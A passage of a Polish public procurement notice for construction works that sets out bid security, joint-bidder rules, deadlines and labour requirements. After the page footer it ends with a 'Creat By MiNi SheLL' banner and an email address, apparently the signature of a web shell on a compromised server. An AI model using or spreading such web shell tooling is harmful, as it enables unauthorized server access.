okresie, wraz z podaniem ich przedmiotu, wartości, dat wykonania i podmiotów, na rzecz których roboty zostały wykonane oraz załączeniem dowodów określających czy te roboty zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty zostały wykonane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie Wykonawcy. Wzór wykazu stanowi załącznik nr 7 do SWZ.<br/><br/>4. Wykazu osób, którymi dysponuje lub będzie dysponował i które będą<br/>uczestniczyć w wykonaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, wykształcenia niezbędnego do wykonania zamówienia, zakresu wykonywanych przez nich czynności oraz podstawie do dysponowania tymi osobami - zgodnie ze wzorem stanowiącym załącznik nr 8 do SWZ .</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga złożenia przedmiotowych środków dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Zamawiający wymaga wniesienia wadium w wysokości 5000 złotych (słownie: pięć tysięcy<br/>złotych). 2. Wadium należy wnieść przed upływem terminu składania ofert.3. Wadium<br/>może być wnoszone w pieniądzu, gwarancjach bankowych; gwarancjach ubezpieczeniowych;<br/>poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust.5 pkt 2 ustawy z dnia 9<br/>listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. z 2 019r.<br/>poz.310, 836 i 1572).4. Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek<br/>bankowy Zamawiającego w PKO BP – nr rachunku: 42 1020 2892 0000 5402 0726 3348.W<br/>tytule przelewu należy wskazać numer postępowania którego dotyczy o zamówienie oraz na<br/>jaką część jest składane wadium.5. Za termin wniesienia wadium w formie pieniężnej przyjmuje<br/>się termin uznania rachunku bankowego zamawiającego.6. Wadium wnoszone w formie innej niż<br/>pieniężna musi być wniesione w oryginale w postaci elektronicznej i musi obejmować cały okres<br/>związania ofertą. Gwarancja lub poręczenie musi zawierać w swojej treści nieodwołalne i<br/>bezwarunkowe zobowiązane wystawcy dokumentu do zapłaty na rzecz Zamawiającego kwoty<br/>wadium płatne na pierwsze pisemne żądanie Zamawiającego. Wadium należy załączyć do<br/>zaszyfrowanej zgodnie z zapisami SWZ oferty wykonawcy. Zwrot wadium przetargowego<br/>nastąpi zgodnie z art. 98 ustawy Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Informacje dla Wykonawców wspólnie ubiegających się o udzielenie zamówienia (np.<br/>Konsorcjum, spółki cywilne)1.. Zamawiający w stosunku do wykonawców wspólnie ubiegających<br/>się o udzielenie zamówienia w odniesieniu do warunku dotyczącego zdolności technicznej lub<br/>zawodowej dopuszcza łączne spełnienie warunku przez wykonawców.2. Spełnienie warunków<br/>udziału w postępowaniu przez wykonawców wspólnie ubiegających się o udzielenie zamówienia<br/>będzie weryfikowane przez Zamawiającego zgodnie z art. 117 ust. 3 ustawy Pzp.3. Wykonawcy<br/>wspólnie składający ofertę, wraz z ofertą składają oświadczenie, z którego wynika który zakres<br/>przedmiotu zamówienia wykonają poszczególni wykonawcy. Przedmiotowe oświadczenie<br/>zawiera treść formularza ofertowego stanowiącego załącznik nr 1 do SWZ. 4. Wykonawcy,<br/>którzy wspólnie ubiegają się o udzielenie zamówienia: a) są zobowiązani ustanowić<br/>Pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich w<br/>postępowaniu i do zawarcia umowy.Wszelka korespondencja kierowana będzie wyłącznie do<br/>podmiotu występującego jako pełnomocnik.b) są zobowiązani do złożenia w ofercie<br/>Pełnomocnictwa ustanawiającego Pełnomocnika, o którym mowa w pkt 8.5 a) specyfikacji.<br/>Pełnomocnictwo zawierać powinno umocowanie do reprezentowania w postępowaniu lub do<br/>reprezentowania w postępowaniu i zawarcia umowy. Pełnomocnictwo winno być przekazane<br/>przez Wykonawcę w formie elektronicznej. W przypadku, gdy Wykonawca nie posiada<br/>pełnomocnictwa w formie elektronicznej (tj. z kwalifikowanym podpisem osoby uprawnionej do<br/>jego udzielenia), a posiada dla danej osoby pełnomocnictwo tylko w formie pisemnej (tj. z<br/>własnoręcznym podpisem osoby uprawnionej do jego udzielenia), może złożyć cyfrowe<br/>odwzorowanie tego dokumentu opatrzone kwalifikowanym podpisem elektronicznym lub<br/>podpisem zaufanym lub podpisem osobistym poświadczającym zgodność cyfrowego odwzorowania z dokumentem w postaci papierowej. Sposób poświadczenia zgodności<br/>cyfrowego odwzorowania z dokumentem w postaci papierowej, o którym mowa w zdaniu<br/>poprzedzającym reguluje Rozporządzenie ws. komunikacji elektronicznej.5. Wykonawcy<br/>wspólnie ubiegający się o udzielenie zamówienia publicznego składają, każdy z osobna,<br/>dokumenty wymienione w pkt 9.1 SWZ.6. Dokumenty te powinny potwierdzać spełnienie<br/>warunków udziału w postępowaniu oraz brak podstaw wykluczenia, w zakresie, w którym każdy<br/>z Wykonawców wykazuje spełnienie warunków udziału w postępowaniu oraz brak podstaw<br/>wykluczenia.7. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia:<br/>żaden z tych Wykonawców nie może podlegać wykluczeniu w okolicznościach, o których mowa<br/>pkt 7 SWZ.8. Celem wykazania braku podstaw do wykluczenia, o których mowa w pkt 7 SWZ<br/>oraz spełnienia warunków udziału w postępowaniu o których mowa w pkt 8.1. SWZ Wykonawcy<br/>składają oświadczenia i dokumenty określone w pkt 9 SWZ w sposób i w trybie tam określonym. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian umowy oraz warunków ich wprowadzenia zawiera załącznik nr 3 do SWZ<br/>tj. Projektowane Postanowienia Umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-06-16 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem Formularza do złożenia, zmiany, wycofania oferty lub wniosku dostępnego na ePUAP i udostępnionego również na miniPortalu</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-06-16 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-07-14</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> I zabezpieczenie <br/>1. Wykonawca, który wygra postępowanie zobowiązany jest do wniesienia zabezpieczenia należytego wykonania umowy zgodnie z art. 450 ustawy Pzp., w wysokości 5% ceny całkowitej<br/>podanej w ofercie.2. Treść art. 449-453 ustawy Pzp dotycząca zabezpieczenia należytego<br/>wykonania umowy będzie miała zastosowanie w ramach zawartej umowy.3. W przypadku<br/>wpłaty zabezpieczenia w formie pieniężnej należy je wpłacić przelewem na rachunek bankowy<br/>Zamawiającego w PKO BP –nr rachunku: 42 1020 2892 0000 5402 0726 3348.4. W przypadku<br/>wniesienia wadium w pieniądzu, za zgodą Wykonawcy, kwota wadium może zostać zaliczona<br/>na poczet zabezpieczenia.5. UWAGA: Przed złożeniem poręczenia lub gwarancji Wykonawca<br/>winien przedstawić projekt dokumentu Zamawiającemu w celu uzyskania akceptacji jego treści.<br/>Szczegółowe uregulowania dotyczące zabezpieczenia należytego wykonania umowy zawiera<br/>SWZ wraz z załącznikami.<br/><br/>II obowiązek zatrudnienie na umowę o pracę. <br/>Zamawiający zgodnie z art. 95 ust. 1-2 ustawy Pzp, wymaga zatrudnienia przez wykonawcę lub podwykonawcę na podstawie umowy o pracę osób wykonujących wskazane przez Zamawiającego następujące czynności w zakresie realizacji zamówienia (za wyjątkiem osób pełniących tzw. samodzielne funkcje techniczne w budownictwie w rozumieniu ustawy Prawo budowlane): <br/>pracowników fizycznych – bezpośrednie wykonywanie robót budowlanych. <br/>Zamawiający dopuszcza możliwość osobistego realizowania zamówienia przez osoby prowadzące działalność gospodarczą lub wspólników spółki prawa handlowego.<br/>Zamawiający, przed podpisaniem umowy jak i w trakcie jej realizacji ma prawo do kontroli spełnienia przez Wykonawcę lub Podwykonawcę wymagania wskazanego w punkcie powyżej, w szczególności poprzez zlecenie kontroli Państwowej Inspekcji Pracy oraz zgodnie z zapisami Projektowanych Postanowień Umowy.</main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-05-31 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com